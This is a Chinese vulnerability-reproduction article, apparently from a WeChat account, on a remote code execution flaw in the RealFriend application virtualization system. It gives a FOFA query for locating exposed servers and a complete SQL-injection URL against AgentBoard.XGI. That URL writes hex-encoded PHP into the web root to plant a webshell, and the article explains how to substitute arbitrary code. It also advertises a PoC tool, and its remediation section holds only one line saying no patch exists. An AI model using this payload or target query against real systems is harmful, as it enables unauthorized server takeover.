文章目录
瑞友天翼应用虚拟化系统存在远程代码执行漏洞1. 瑞友天翼应用虚拟化系统简介2.漏洞描述3.影响版本4.fofa 查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾瑞友天翼应用虚拟化系统存在远程代码执行漏洞
1. 瑞友天翼应用虚拟化系统简介
微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发
瑞友天翼应用虚拟化系统是具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。
2.漏洞描述
瑞友天翼应用虚拟化系统存在远程代码执行漏洞,攻击者可以利用此漏洞获WEB主机权限。
3.影响版本
4.fofa 查询语句
title=“瑞友天翼-应用虚拟化系统”
5.漏洞复现
先把去以下网址把你的需要写入的php代码转换成16进制
例如<?php phpinfo();?> 转换成16进制是
<?php phpinfo();?> 转换成16进制 3c3f70687020706870696e666f28293b3f3e
我需要把这个文件保存在根目录的 testtest.php文件内。
拼接你的文件名和php代码16进制值,得到如下地址,然后访问。
拼接得到如下地址
http://127.0.0.1/AgentBoard.XGI?user=%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FRealFriend%2FRap%20Server%2FWebRoot%2Ftesttest.php%27%20LINES%20TERMINATED%20BY%200x3c3f70687020706870696e666f28293b3f3e--%20-&cmd=UserLogin
访问以上链接后,webshell地址就保存在根目录下
http://127.0.0.1/testtest.php
6.POC&EXP
关注公众号 南风漏洞复现文库 并回复 漏洞复现20 即可获得该POC工具下载地址:
本次的poc加入了代理功能,方便各位师傅调试。
7.整改意见
厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: